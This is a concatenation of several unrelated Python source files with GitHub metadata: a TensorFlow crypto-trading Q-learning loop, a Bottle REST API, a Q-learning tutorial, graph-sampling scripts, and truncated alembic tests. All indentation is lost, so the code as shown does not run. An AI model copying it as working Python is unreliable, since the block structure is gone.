the_p = np.reshape(np.array(M.TRAIN_HOLD[PRICE_TENSOR_COLS]), (-1, len(PRICE_TENSOR_COLS)) )
the_q = np.reshape(np.array(M.TRAIN_HOLD[M.COLS_Y_TRAIN]), (-1, len(M.COLS_Y_TRAIN)) )
the_w = np.reshape(np.array(M.TRAIN_HOLD[M.PORT_W]), (-1, len(M.PORT_W)) )
#for i in range(int(num_depth+0.5)):
i = 0
PR_KEEP_1, PR_KEEP_2, PR_KEEP_3 = 0.70, 0.70, 0.70
use_sample = True
while i < 2000000000:
rates = {0 : 0.0005,
1e4 : 0.0001,
3e4 : 0.00003,
1e6 : 0.00001}
if i in rates:
update_LR = tf.assign(LEARNING_RATE, rates[i])
sess.run(update_LR)
opt = train_step
#opt = train_step_start if i < 200 or random.random() < 0.02 else train_step
#l_func = loss_func_start if i < 200 else loss_func
#opt = train_step
watch.start("Gradient_Update")
if use_sample:
n_samples = min(i//100+500, round(0.2 * len(the_p)) )
#n_samples = 50
#samples = [int(random.random()**0.5 * len(the_p)) for _ in range(n_samples)]
samples = random.sample(range(len(the_p)), n_samples)
x_noise = np.random.normal(0, 0.15, the_p[samples,:].shape)
#y_noise = np.random.normal(-1e-9, 1e-9, the_q[samples,:].shape)
#samples = random.sample(range(len(the_p)), round(0.3*len(the_p)))
sess.run(opt,
feed_dict = {X_PRICE_TENSOR : the_p[samples,:] + x_noise,
Q_TARGET : the_q[samples,:],
HOLD_W : the_w[samples,:],
keep_p1 : PR_KEEP_1, keep_p2 : PR_KEEP_2, keep_p3 : PR_KEEP_3})
else:
sess.run(opt,
feed_dict = {X_PRICE_TENSOR : the_p,
Q_TARGET : the_q,
HOLD_W : the_w,
keep_p1 : PR_KEEP_1, keep_p2 : PR_KEEP_2, keep_p3 : PR_KEEP_3} )
watch.end("Gradient_Update")
if i % 100 == 0:
train_loss = sess.run(loss_func,
feed_dict = {X_PRICE_TENSOR : the_p,
Q_TARGET : the_q,
HOLD_W : the_w,
keep_p1 : 1, keep_p2 : 1, keep_p3 : 1} )
price_state = np.reshape(M.TEST[PRICE_TENSOR_COLS], (-1, len(PRICE_TENSOR_COLS)) )
truth = np.reshape(M.TEST[M.COLS_Y], (-1, len(M.COLS_Y)) )
w = np.reshape(M.TEST[M.PORT_W], (-1, len(M.PORT_W)) )
test_loss, losing_mean, opt_loss = sess.run([loss_func, losing_trades_mean, opt_func],
feed_dict = {X_PRICE_TENSOR : price_state,
Q_TARGET : truth,
HOLD_W : w,
keep_p1 : 1, keep_p2 : 1, keep_p3 : 1} )
if test_loss < smallest_loss and i > 1000:
# Add ops to save and restore all the variables.
saver = tf.train.Saver()
# Save the variables to disk.
saver.save(sess, "{}\\model.ckpt".format(Constants.SAVE_PATH))
print("Model saved in path: {}".format(Constants.SAVE_PATH))
M.save()
smallest_loss = test_loss
'''test_loss_trans = sess.run(l_func,
feed_dict = {X_PRICE_TENSOR : price_state,
Q_TARGET : np.reshape(M.TEST[M.COLS_Y_TRAIN], (-1, len(M.COLS_Y_TRAIN)) ),
HOLD_W : w,
keep_p1 : 1, keep_p2 : 1, keep_p3 : 1} )'''
train_losses.append(train_loss)
test_losses.append(test_loss)
transf_losses.append(losing_mean)
opt_losses.append(opt_loss)
fig, ax1 = plt.subplots()
plot_window = 1000
train_plot_data = pd.Series(train_losses[-plot_window:]).rolling(5).mean()
test_plot_data = pd.Series(test_losses[-plot_window:]).rolling(5).mean()
transf_plot_data = pd.Series(transf_losses[-plot_window:]).rolling(5).mean()
opt_plot_data = pd.Series(opt_losses[-plot_window:]).rolling(5).mean()
color = 'tab:red'
ax1.set_xlabel('iteration')
ax1.set_ylabel('train loss', color=color)
ax1.plot(range(1, len(train_plot_data)+1), train_plot_data, color=color)
ax1.tick_params(axis='y', labelcolor=color)
ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis
color = 'tab:blue'
ax2.set_ylabel('test loss', color=color) # we already handled the x-label with ax1
ax2.plot(range(1, len(test_plot_data)+1), test_plot_data, color=color)
ax2.tick_params(axis='y', labelcolor=color)
ax3 = ax2.twinx() # instantiate a second axes that shares the same x-axis
color = 'tab:green'
ax3.set_ylabel('L2 Loss', color=color) # we already handled the x-label with ax1
ax3.plot(range(1, len(transf_plot_data)+1), transf_plot_data, color=color)
ax3.tick_params(axis='y', labelcolor=color)
ax4 = ax3.twinx() # instantiate a second axes that shares the same x-axis
color = 'tab:orange'
ax4.set_ylabel('Loss Value', color=color) # we already handled the x-label with ax1
ax4.plot(range(1, len(opt_plot_data)+1), opt_plot_data, color=color)
ax4.tick_params(axis='y', labelcolor=color)
fig.tight_layout() # otherwise the right y-label is slightly clipped
plt.show()
DailyReturnTrain = 100 * (10**(-train_losses[-1] * TIMESTEP_DAYS) - 1)
DailyReturnTest = 100 * (10**(-test_losses[-1] * TIMESTEP_DAYS) - 1)
#DailyReturnTrain = -train_losses[-1] * TIMESTEP_DAYS
#DailyReturnTest = -test_losses[-1] * TIMESTEP_DAYS
print("Iteration: {:<10}, Train Loss: {:<.8f}, Test Loss: {:<.8f}, "
"Test Daily Return: {}{:<.2f}%{}".
format(i,train_loss, test_loss, (COL_G if DailyReturnTest > 0 else COL_R), DailyReturnTest, COL_W))
if i % 1000 == 0:
gc.collect()
watch.display()
if i % 100000 == 0 and i > 0:
'''M.TEST = D
M.TEST['MARGIN_USD'] = 0
M.TEST['MARGIN_BMXBTCUSD'] = 0
M.TEST['MARGIN_BMXBTCUSD_S'] = 0
M.TEST['reward_USD'] = 0
M.TEST['reward_BMXBTCUSD'] = M.TEST['close_BMXBTCUSD'].shift(-1) / M.TEST['close_BMXBTCUSD']
M.TEST['reward_BMXBTCUSD'] = M.TEST['reward_BMXBTCUSD'].apply(lambda x : math.log10(x))
M.TEST['reward_BMXBTCUSD_S'] = M.TEST['reward_BMXBTCUSD'].apply(lambda x : -x)
'''
gc.collect()
dat = M.TEST
'''dat = M.data
state = np.array(dat[M.COLS_X])
price_state = np.array(dat[PRICE_TENSOR_COLS])
w = np.array(dat[M.PORT_W])
nn_outs, Q_pred = sess.run([CL_flat, Q_PREDICT], feed_dict = {
X_PRICE_TENSOR : price_state.reshape(-1, len(PRICE_TENSOR_COLS) ),
keep_p1 : 1, keep_p2 : 1, keep_p3 : 1
} )
lst = []
out_data = dat.copy()
out_cols = []
act_cols = []
for idx in range(len(nn_outs[0])):
lst = [x[idx] for x in nn_outs]
c = "NN_OUT_{}".format(idx+1)
out_data[c] = lst
out_cols.append(c)
for idx, action in enumerate(M.ACTIONS):
print(idx, action)
lst = [x[idx] for x in Q_pred]
c = "ACT_{}".format(action)
out_data[c] = lst
out_cols.append(c)
act_cols.append(c)
if idx >= len(M.ACTIONS) / M.MULTS - 1:
break
out_cols += M.COLS_Y[ : len(M.COLS_Y) // M.MULTS ]
out_data[out_cols].to_csv("Crypto Q Data.csv",index=False)
C = sklearn.cluster.KMeans(10)
C.fit(out_data[:len(M.TRAIN)][act_cols])
plt.plot(C.cluster_centers_, 'o')
out_data['state'] = C.predict(out_data[act_cols])
out_cols.append('state')
out_data[out_cols].to_csv("Crypto Q Data.csv",index=False)
#(C.cluster_centers_ - out_data[act_cols])**2
tr = out_data[:len(M.TRAIN)][act_cols]
kMeansVar = [KMeans(n_clusters=k).fit(tr) for k in range(1, 20)]
centroids = [X.cluster_centers_ for X in kMeansVar]
k_euclid = [cdist(tr, cent) for cent in centroids]
dist = [np.min(ke, axis=1) for ke in k_euclid]
wcss = [sum(d**2) for d in dist]
tss = sum(pdist(tr)**2)/tr.shape[0]
bss = tss - wcss
plt.plot(bss)
plt.show()
tr = out_data[:len(M.TRAIN)]
Q = {}
for st in set(out_data.state):
for a in act_cols:
Q[(st,a)] = {}
for a2 in act_cols:
Q[(st,a)][a2] = 0
def getAction(state, epsilon=0.05, bestAct=False):
if random.random() < epsilon:
return random.choice((act_cols))
elif bestAct == False:
return np.random.choice(list(Q[state].keys()), p=softmax(list(Q[state].values())))
else:
best, best_v = None, 0
for k,v in Q[state].items():
if best is None:
best = k
best_v = v
continue
if v > best_v:
best = k
best_v = v
return best
num_iter = 0
loop_forever = True
while loop_forever:
try:
H = random.choice(act_cols)
pos = random.randint(0, len(M.TRAIN)-2)
current_state = tr.at[pos, "state"], H
current_action = getAction(current_state, 0.1, False)
reward = tr.ix[pos, current_action.replace("ACT","reward")]
if H != current_action:
reward += math.log10( 1 - 0.000 )
new_state = tr.at[pos+1, "state"], current_action
next_best_rw = max(Q[new_state].values())
td_target = reward + 0.99 * next_best_rw
td_error = td_target - Q[current_state][current_action]
Q[current_state][current_action] += 0.1 * td_error
num_iter += 1
if num_iter % 20000 == 0:
print(num_iter)
#for k, v in Q[(3,"ACT_IOTA")].items():
# print(k, v)
if num_iter % 100000 == 0:
H = "ACT_USD"
tst = out_data[len(M.TRAIN):].reset_index(drop=True)
raws, tcs, rewards = [], [], []
for pos in range(0, len(tst)-1):
current_state = tst.at[pos, "state"], H
current_action = getAction(current_state, 0, True)
reward = tr.ix[pos, current_action.replace("ACT","reward")]
if H != current_action:
tc = math.log10( 1 - 0.002 )
else:
tc = 0
raws.append(reward)
tcs.append(tc)
rewards.append(reward+tc)
H = current_action
plt.plot(pd.Series(raws).cumsum())
print(list(pd.Series(raws).cumsum())[-1])
gc.collect()
#plt.plot(pd.Series(rewards).cumsum())
plt.show()
except KeyboardInterrupt:
loop_forever = False
break'''
print( len(dat) )
M.position = 0
dat[M.PORT_W] = 0
dat["MARGIN_USD"] = 1
prevHoldings = None
all_qs_out = []
G = []
profits, scaled_profits = [], []
costs, n_switch = [], []
Vs = []
price_states = np.array(dat[PRICE_TENSOR_COLS])
for test_pos in range(0, len(dat)-1):
w = np.array(dat.loc[M.position, M.PORT_W]).reshape(-1, len(M.PORT_W))
Q, V = sess.run([Q_PREDICT, Q_UNSCALED], feed_dict = {
X_PRICE_TENSOR : price_states[test_pos].reshape(-1, len(PRICE_TENSOR_COLS) ),
HOLD_W : w,
keep_p1 : 1, keep_p2 : 1, keep_p3 : 1
} )
all_qs_out.append(np.round(Q[0], 3))
act = M.ACTIONS[np.argmax(Q)]
if USE_SIGMOID:
binaries = np.apply_along_axis(lambda x : 1 if x > 0.5 else 0, 0, Q)
else:
binaries = [0] * len(M.ACTIONS)
binaries[np.argmax(Q)] = 1
binaries = np.array(binaries)
profit = sum(binaries * dat.ix[M.position, M.COLS_Y])
#if profits:
#profit *= ( 10 ** pd.Series(profits).cumsum()[len(profits)-1] )
tc = 0
if prevHoldings is None:
prevHoldings = binaries
n_switch.append(0)
else:
chng = np.abs(binaries - prevHoldings)
n_switch.append(chng.sum() > 0)
chng = chng * math.log10(1-0.075/100)
#chng = chng * -1
tc = sum(chng)
prevHoldings = binaries
costs.append(tc)
profits.append(profit)
G.append(profit+tc)
M.position += 1
Vs.append( max(0, max(V[0]) ) )
scaled_profits.append(profit * Vs[-1]**0.5 )
#act = M.ACTIONS[np.random.choice(range(len(M.ACTIONS)),
# p = softmax(Q[0]))]
#G.append( M.stepTest(act) )
for w in M.PORT_W:
dat.set_value(M.position, w, 0)
dat.set_value(M.position,
M.PORT_W[M.ACTIONS.index(act)],
1)
if test_pos % 1000 == 0 and test_pos > 0:
print("Switch Rate: {:.2f}%".format( 100.0 * sum(n_switch) / len(n_switch) ))
plt.plot(pd.Series(profits).cumsum())
#plt.plot(pd.Series(G).cumsum())
plt.show()
plt.plot(pd.Series(profits).cumsum())
print("Switch Rate: {:.2f}%".format( 100.0 * sum(n_switch) / len(n_switch) ))
projections.append(pd.Series(G).cumsum())
for num_p, p in enumerate(projections[::-1]):
plt.plot(p)
print(p[len(p)-1])
if num_p >= 10:
break
plt.show()
for idx in range(len(all_qs_out[0])):
hold_data = [x[idx] for x in all_qs_out]
plt.plot(pd.Series(hold_data).rolling(200).mean())
#for c in M.PORT_W:
# plt.plot(pd.rolling_mean(dat[c], 10))
plt.legend(M.PORT_W)
plt.show()
i += 1
watch.end("Gradient_Update")
all_losses.append(train_loss)
rolling_window = 2000
watch.start("rolling_loss")
rolling_loss = np.mean( all_losses[-rolling_window:] )
watch.end("rolling_loss")
#update_drop_rt = tf.assign(tf_keep_prob, 1)
#sess.run(update_drop_rt)
Q_NEW = sess.run(Q_PREDICT, feed_dict = {
X_PRICE_TENSOR : np.reshape(USD_PRICE_STATE,(-1, len(PRICE_TENSOR_COLS)) ),
keep_p1 : 1, keep_p2 : 1, keep_p3 : 1
} )
print("Episode: {:<12}, Rolling Loss: {:.6f}, Position: {}".format(
episode, rolling_loss*10**5, init_pos))
print("Target: {:<24}, Pred: {:<24}, Upd: {:<24}, Epsilon: {:.2f}%".format(
"["+"".join(["{}{:<6.3f}%\033[0m ".format(COL_R if x < 0 else G, 100*(10**x-1))
for x in usd_target])+"]",
"["+"".join(["{}{:<6.3f}%\033[0m ".format(COL_R if x < 0 else G, 100*(10**x-1))
for x in Q_USD[0]])+"]",
"["+"".join(["{}{:<6.3f}%\033[0m ".format(COL_R if x < 0 else G, 100*(10**x-1))
for x in (Q_NEW-Q_USD)[0]])+"]",
100*epsilon))
#print(episode, targetQ[0], Q1[0], (Q_NEW-Q1)[0], loss, "{:.6f}".format(epsilon))
X_STATES, PRICE_STATES, Q_PREDS, Q_TARGETS = [], [], [], []
epsilon = 10/((episode/500) + 10)
epsilon = max(0.001, epsilon)
epsilon = 0
if episode % 500 == 0:
watch.display()
episode += 1
|
[
"noreply@github.com"
] |
rendorHaevyn.noreply@github.com
|
f0b2fd63ab10a9a07a323590d9f9ac4a841cc01d
|
07a4d568e01ed82ab71f4a5e0916c872249c23c3
|
/morris_api.py
|
43128f9d9165881b45912c10c32025e04e6ded94
|
[
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] |
permissive
|
joshuaeveleth/MorrisDataDecorator
|
04d20bc5c3d0e78f754e47df7ba0315fe38507b5
|
a148b579082772c9e43f1aad484e5f8a3520ecc1
|
refs/heads/master
| 2021-01-12T08:01:44.073946
| 2014-07-30T19:23:58
| 2014-07-30T19:23:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,715
|
py
|
from bottle import Bottle, template,request,TEMPLATE_PATH,static_file,response
import morris
import morris_memory
import morris_solr
import StringIO
import sys
import logging
import morris_config
logger = logging.getLogger('morris_api_logger')
hdlr = logging.FileHandler('../logs/morris_api.log')
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.INFO)
app = Bottle()
# This is a global we want to remain in memory for all persistence
# across all calls...at least for now.
# md = morris_memory.InMemoryMorrisDecorator()
SOLR_URL = "http://localhost:8983/solr"
# We can also test the InMemory Module here. I need to
# make this more configurable.
md = morris_solr.SolrMorrisDecorator(morris_config.SOLR_URL) if\
(morris_config.USE_SOLR_AS_PERSISTENCE) else\
morris.InMemoryMorrisDecorator()
@app.route('/ping_morris_api',method='GET')
def trivtest():
return "true"
# Obviously, this should be used cautiously.
# It exists mainly to support testing through the API.
@app.route('/delete_all',method='GET')
def delete_all():
md.deleteAll()
#BEGIN DECORATION SECTION
@app.route('/decoration', method='GET')
def read_all_decorations():
records = {'data': md.getAllDecorations()}
return records
@app.route('/decoration_export', method='GET')
def export_all_decorations_as_csv():
return md.exportDecorationsAsCSV()
@app.route('/decoration_records', method='GET')
def export_all_records_as_csv():
return md.exportDecorationsToContentsAsCSV()
@app.route('/decoration_records_with_client_data/<columns>', method='GET')
def export_all_records_as_csv_with_client_data(columns):
cols = columns.split(',')
return md.exportDecorationsToContentsAsCSVWithClientDataColumns(cols)
@app.route('/content_records_with_client_data/<columns>', method='GET')
def export_all_records_as_csv_with_client_data(columns):
cols = columns.split(',')
return md.exportContentsToDecorationsAsCSVWithClientDataColumns(cols)
@app.route('/decoration/<name>', method='GET')
def read_decoration(name):
records = md.getContentsForDecoration(name)
return {'data': records}
# I tried to do this as an actual delete, which would make more sense.
# Unfortunately, I couldn't get bottle to recognize it.
# This would be much improved if it returned the number deleted.
@app.post('/delete_decoration/<name>')
def delete_decoration(name):
md.deleteDecorations([name])
return { "success" : True, "error" : "" }
@app.route('/content/<name>', method='GET')
def read_decoration(name):
records = md.getDecorationsForContent(name)
return {'data': records}
@app.route('/decoration/<name>', method='POST')
def create_decoration(name):
success = str(md.createDecorations([name]))
return success
@app.route('/content/<name>', method='POST')
def create_content(name):
success = str(md.createContents([name]))
return success
@app.route('/decoration/add_client_data/<decoration>/<data_name>/<cd:path>', method='POST')
def add_client_data_decoration(decoration,data_name,cd):
md.addClientDataDecoration(decoration,data_name,cd)
return {}
@app.route('/content/add_client_data/<content>/<data_name>/<cd:path>', method='POST')
def add_client_data_content(content,data_name,cd):
md.addClientDataContent(content,data_name,cd)
return {}
@app.route('/test/add_client_data/<content>/<data_name>/<cd:path>', method='POST')
def test_content(content,data_name,cd):
md.addClientDataContent(content,data_name,"spud")
return {}
@app.route('/decoration/add_record/<decoration>/<key>',method='POST')
def add_record_to_decoration(decoration,key):
logger.info("Called add_record_to_decoration({0},{1})".format(decoration,key))
return md.associateDecorationWithContentSingle(decoration,key)
@app.route('/decoration/<name>', method='DELETE')
def delete_decoration( name="Mystery Recipe" ):
return { "success" : False, "error" : "delete not implemented yet" }
@app.route('/delete_association/<decoration>/<content>', method='POST')
def delete_association(decoration,content):
return md.deleteAssociation(decoration,content)
#END DECORATION SECTION
#BEGIN MORRIS CONTENT MANAGEMENT
@app.route('/record', method='GET')
def get_an_arbitrary_record():
return { "content" : "This is the first record. But not really." }
@app.route('/record_integer/<tag>/<key>',method='GET')
def get_record_integer(tag,key):
return md.getRecordInteger(tag,key)
@app.route('/record_integer/<tag>/<key>/<delta>',method='POST')
def get_record_integer(tag,key,delta):
return md.changeRecordInteger(tag,key,delta)
#END MORRIS CONTENT MANAGEMENT
|
[
"read.robert@gmail.com"
] |
read.robert@gmail.com
|
355a6738a78d86716336d103611c3358a7811bbf
|
d4b775d45053fb791392d956da1f0c427a869e78
|
/search.py
|
f852f5dc2e3ba88461c30a46961114b927a25f93
|
[] |
no_license
|
sirlancer/reinforcement_learning
|
545d6cbf0c1f6986b2a7f1b1dea0c7495d20d2a6
|
f4a23c76a89f9d4babe9a345c5e125f061f25620
|
refs/heads/master
| 2021-01-23T22:30:55.311524
| 2017-09-09T08:22:11
| 2017-09-09T08:22:11
| 102,938,391
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,360
|
py
|
import numpy as np
import pandas as pd
import time
np.random.seed(2)
N_STATES = 6
ACTIONS = ['left', 'right']
EPSILON = 0.9
ALPHA = 0.1
LAMBDA = 0.9
#训练回合数
MAX_EPISODES = 13
FRESH_TIME = 0.3
#创建 q 表
def build_q_table(n_states, actions):
table = pd.DataFrame(np.zeros((n_states, len(actions))), columns=actions)
return table
#根据当前状态选择动作
def choose_action(state, q_table):
state_actions = q_table.iloc[state, :]
if (np.random.uniform() > EPSILON) or (state_actions.all() == 0):
action_name = np.random.choice(ACTIONS)
else:
action_name = state_actions.argmax()
return action_name
#与环境交互
def get_env_feedback(S, A):
if A == 'right':
R = 1
if S == 5:
S_ = 'termination'
else:
S_ = S + 1
else:
R = -1
if S == 0:
S_ = S
else:
S_ = S - 1
return S_, R
#更新环境
def update_env(S, episode, step_counter):
env_list = ['-']*(N_STATES - 1) + ['T']
if S == 'termination':
interaction = 'Episode %s: total_steps = %s' % (episode+1, step_counter)
print('\r{}'.format(interaction), end='')
time.sleep(2)
print()
else:
env_list[S] = 'o'
interaction = ''.join(env_list)
print('\r{}'.format(interaction), end='')
time.sleep(FRESH_TIME)
def rl():
q_table = build_q_table(N_STATES, ACTIONS)
for episode in range(MAX_EPISODES):
step_counter = 0
S = 0
is_terminated = False
update_env(S, episode, step_counter)
while not is_terminated:
A = choose_action(S, q_table)
S_, R = get_env_feedback(S, A)
q_predict = q_table.ix[S, A]
if S_ != 'termination':
q_target = R + LAMBDA * q_table.iloc[S_, :].max()
else :
q_target = R
is_terminated = True
q_table.ix[S, A] = (1 - ALPHA) * q_predict + ALPHA * q_target
S = S_
update_env(S, episode, step_counter+1)
step_counter += 1
# print(q_table)
print(q_table)
return q_table
if __name__ == '__main__':
# table = build_q_table(N_STATES, ACTIONS)
rl()
|
[
"920365914@qq.com"
] |
920365914@qq.com
|
795516fb98dfa791ca739785a945225f18ddd615
|
a8b311f6c579a70cdca12cdff73aca18ddf5e1f4
|
/DataAnalysisMethods2/2cvic.py
|
79b6e882c9b92b0d404833d23c1e9d09cd035cce
|
[] |
no_license
|
MarekUlip/CollegePythonScripts
|
ec09c7730752b7bd6b85fe523470acf9d124df53
|
9133a864ab301d9076394ce9345faa5c2c878adf
|
refs/heads/master
| 2022-11-13T12:15:56.198341
| 2020-07-06T22:26:26
| 2020-07-06T22:26:26
| 277,658,408
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,111
|
py
|
import csv
import math
import os
import random
import matplotlib.pyplot as plt
def count_min_probabilty(n):
return math.log(n) / n
def count_prop_for_edges(num_of_edges, n):
return (num_of_edges * 2) / (n * (n - 1))
def create_random_graph(n, p):
edges = []
# p by melo by vetsi nez 0,000921 pro 10000 vrcholu - ostry prah nad kterym bude sit souvisla
matrix = [[0 for x in range(n)] for y in range(n)]
for i in range(n):
for j in range(n):
col = j + i + 1
if col >= n:
break
rnd = random.random()
if rnd < p:
matrix[i][col] = 1
edges.append([i, col])
matrix[col][i] = 1
# [print(row) for row in matrix]
# write_vertices_to_csv(edges,"random-chart.csv")
return matrix
def create_barabasi_albert_graph_dynamic(n, m, m0):
edges = []
vertice_count = n - m0
current_count = m0
vertice_list = []
for i in range(m0):
for j in range(m0 - 1):
vertice_list.append(i)
neighbour_matrix = [[0 for x in range(n)] for y in range(n)]
for i in range(m0 - 1):
for j in range(1, m0):
if i == j:
continue
edges.append([i, j])
neighbour_matrix[i][j] = neighbour_matrix[j][i] = 1
# print(edges)
# print(vertice_list)
for i in range(vertice_count):
v_neighs = []
for j in range(m):
rnd = random.randint(0, len(vertice_list) - 1)
if vertice_list[rnd] not in v_neighs:
v_neighs.append(vertice_list[rnd])
for neigh in v_neighs:
vertice_list.insert(vertice_list.index(neigh), neigh)
edges.append([current_count, neigh])
neighbour_matrix[current_count][neigh] = neighbour_matrix[neigh][current_count] = 1
for j in range(m):
vertice_list.append(current_count)
current_count += 1
# write_vertices_to_csv(edges,"barabasi-albert.csv")
# print("Vertice list: {} {}".format(vertice_list, vertice_count))
return neighbour_matrix
def random_node_sampling(matrix, p, limit_on_p):
n = len(matrix)
edges = []
nodes = []
for i in range(n):
rnd = random.random()
if p > rnd:
nodes.append(i)
for index, item in enumerate(matrix[i]):
if item > 0:
if index not in nodes:
nodes.append(index)
edges.append([i, index])
if limit_on_p and len(nodes) > len(matrix) * p:
print("Limiting with count {}".format(len(nodes)))
return [edges, nodes]
print(len(nodes))
# print(len(edges))"""
return [edges, nodes]
def degree_based_sampling(matrix, p, limit_on_p):
n = len(matrix)
edges = []
nodes = []
for i in range(n):
rnd = random.random()
degree = sum(matrix[i])
passed = False
if degree == 0:
passed = p > rnd
else:
passed = p / degree # p * degree < rnd#(p * degree) > rnd
if passed:
nodes.append(i)
for index, item in enumerate(matrix[i]):
if item > 0:
if index not in nodes:
nodes.append(index)
edges.append([i, index])
if limit_on_p and len(nodes) > len(matrix) * p:
print("Limiting with count {}".format(len(nodes)))
return [edges, nodes]
print(len(nodes))
# print(len(edges))"""
return [edges, nodes]
def cummulative_distribution(X, matrix, nodes, method_name, max_degree=0):
degrees = [sum(row) for index, row in enumerate(matrix) if index in nodes]
max_degree = max(degrees)
rel_degrees = [degree / max_degree for degree in degrees]
counts = {}
for degree in sorted(degrees):
counts[degree] = counts.get(degree, 0) + 1
cumm = 0
distribution = []
for key in counts:
counts[key] /= len(nodes)
cumm += counts[key]
distribution.append([key / max_degree, cumm])
print("Dist len: {}".format(len(distribution)))
# print(counts)
# print(distribution)
# print(distribution)
plt.plot([point[0] for point in distribution], [point[1] for point in distribution], label=method_name)
def plot_chart(file_name):
# plt.axis([0, 1.0, 0, 1.0])
plt.title("Degree cummulative distribution")
plt.xlabel("relative degree")
plt.ylabel("relative cummulative frequency")
plt.legend()
path = os.getcwd() + file_name + ".png"
os.makedirs(os.path.dirname(path), exist_ok=True)
# print(path)
plt.savefig(path)
plt.clf()
def get_max_degree(matrix, nodes):
degrees = [sum(row) for index, row in enumerate(matrix) if index in nodes]
return max(degrees)
def safe_matrix_as_csv(matrix, name):
edges = []
# print(sum([sum(row) for row in matrix]))
for index, row in enumerate(matrix):
for col_index, col in enumerate(row):
if col == 1:
if [index, col_index] in edges or [col_index, index] in edges:
# print("Yea")
continue
edges.append([index, col_index])
# print(len(edges))
write_vertices_to_csv(edges, "{}.csv".format(name))
def write_vertices_to_csv(edges, name):
with open(name, mode='w+', newline='') as stats_file:
csv_writer = csv.writer(stats_file, delimiter=';', quotechar='"', quoting=csv.QUOTE_MINIMAL)
for item in edges:
csv_writer.writerow(item)
node_count = 1000
ba_matrix = create_barabasi_albert_graph_dynamic(node_count, 2, 10)
rn_matrix = create_random_graph(node_count, count_prop_for_edges(2043, node_count))
prob = 0.15
limit_p = True
# nodes_list = random_node_sampling(ba_matrix, prob)[1]
# degree_based_sampling(ba_matrix, prob)
mx_degree = get_max_degree(ba_matrix, range(1000))
plt.clf()
cummulative_distribution(5, ba_matrix, range(1000), "base", mx_degree)
cummulative_distribution(5, ba_matrix, random_node_sampling(ba_matrix, prob, limit_p)[1], "RNA", mx_degree)
cummulative_distribution(5, ba_matrix, degree_based_sampling(ba_matrix, prob, limit_p)[1], "dbs", mx_degree)
plot_chart("\\barabasi-albert")
write_vertices_to_csv(random_node_sampling(ba_matrix, prob, limit_p)[0], "barabasi-rnd.csv")
write_vertices_to_csv(degree_based_sampling(ba_matrix, prob, limit_p)[0], "barabasi-dbs.csv")
cummulative_distribution(5, rn_matrix, range(1000), "base", mx_degree)
cummulative_distribution(5, rn_matrix, random_node_sampling(rn_matrix, prob, limit_p)[1], "RNA", mx_degree)
cummulative_distribution(5, rn_matrix, degree_based_sampling(rn_matrix, prob, limit_p)[1], "dbs", mx_degree)
plot_chart("\\random_chart")
write_vertices_to_csv(random_node_sampling(rn_matrix, prob, limit_p)[0], "random-rnd.csv")
write_vertices_to_csv(degree_based_sampling(rn_matrix, prob, limit_p)[0], "random-dbs.csv")
safe_matrix_as_csv(rn_matrix, "cvic2RandomGraph")
safe_matrix_as_csv(ba_matrix, "cvic2BarabasiGraph")
|
[
"marek.ulip@gmail.com"
] |
marek.ulip@gmail.com
|
58072c21f9c9605e3e4037d7720b652bca3fb124
|
da2ba8fa3342bb317bed49832310ace66007f5da
|
/tests/api/utils/test_alembic_util.py
|
9ab78537607e8c3ee9814901aad899872234c777
|
[
"Apache-2.0"
] |
permissive
|
joaovitor3/mlrun
|
8316ee456a3306e2d9674ab875c84fd917412f66
|
9ad9a6b7ad900c29a9fada7223a5a3123a1a53ef
|
refs/heads/master
| 2023-03-12T17:30:40.046032
| 2021-02-28T12:28:16
| 2021-02-28T12:28:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,494
|
py
|
import alembic
import alembic.config
import os.path
import pathlib
import pytest
import shutil
import typing
import unittest.mock
import mlrun.api.utils.alembic
from mlrun import mlconf
class Constants(object):
revision_history = ["revision2", "revision1"]
initial_revision = "revision1"
latest_revision = "revision2"
unknown_revision = "revision3"
@pytest.mark.parametrize("from_scratch", [True, False])
def test_no_database_exists(
mock_alembic, mock_database, mock_shutil_copy, from_scratch
):
mock_database(db_file_exists=False)
alembic_util = mlrun.api.utils.alembic.AlembicUtil(pathlib.Path(""))
alembic_util.init_alembic(from_scratch=from_scratch)
assert mock_alembic.stamp_calls == []
assert mock_alembic.upgrade_calls == ["head"]
mock_shutil_copy.assert_not_called()
@pytest.mark.parametrize("from_scratch", [True, False])
def test_database_exists_no_revision(
mock_alembic, mock_database, mock_shutil_copy, from_scratch
):
mock_database()
alembic_util = mlrun.api.utils.alembic.AlembicUtil(pathlib.Path(""))
alembic_util.init_alembic(from_scratch=from_scratch)
# from scratch should skip stamp even if no revision exists
expected_stamp_calls = ["revision1"] if not from_scratch else []
assert mock_alembic.stamp_calls == expected_stamp_calls
assert mock_alembic.upgrade_calls == ["head"]
mock_shutil_copy.assert_not_called()
@pytest.mark.parametrize("from_scratch", [True, False])
def test_database_exists_known_revision(
mock_alembic, mock_database, mock_shutil_copy, mock_db_file_name, from_scratch
):
mock_database(current_revision=Constants.initial_revision)
alembic_util = mlrun.api.utils.alembic.AlembicUtil(pathlib.Path(""))
alembic_util.init_alembic(from_scratch=from_scratch)
assert mock_alembic.stamp_calls == []
assert mock_alembic.upgrade_calls == ["head"]
mock_shutil_copy.assert_called_once_with(
mock_db_file_name, pathlib.Path(f"{Constants.initial_revision}.db")
)
@pytest.mark.parametrize("from_scratch", [True, False])
def test_database_exists_unknown_revision_successful_downgrade(
mock_alembic, mock_database, mock_shutil_copy, mock_db_file_name, from_scratch
):
mock_database(current_revision=Constants.unknown_revision)
alembic_util = mlrun.api.utils.alembic.AlembicUtil(pathlib.Path(""))
alembic_util.init_alembic(from_scratch=from_scratch)
assert mock_alembic.stamp_calls == []
assert mock_alembic.upgrade_calls == ["head"]
copy_calls = [
# first copy - backup the current database before downgrading
unittest.mock.call(
mock_db_file_name, pathlib.Path(f"{Constants.unknown_revision}.db")
),
# second copy - to downgrade to the old db file
unittest.mock.call(
pathlib.Path(f"{Constants.latest_revision}.db"), mock_db_file_name
),
# third copy - to back up the db file. In a real scenario the backup would be {latest_revision}.db
# as the revision should change during the last copy, but changing a mock during the init_alembic function
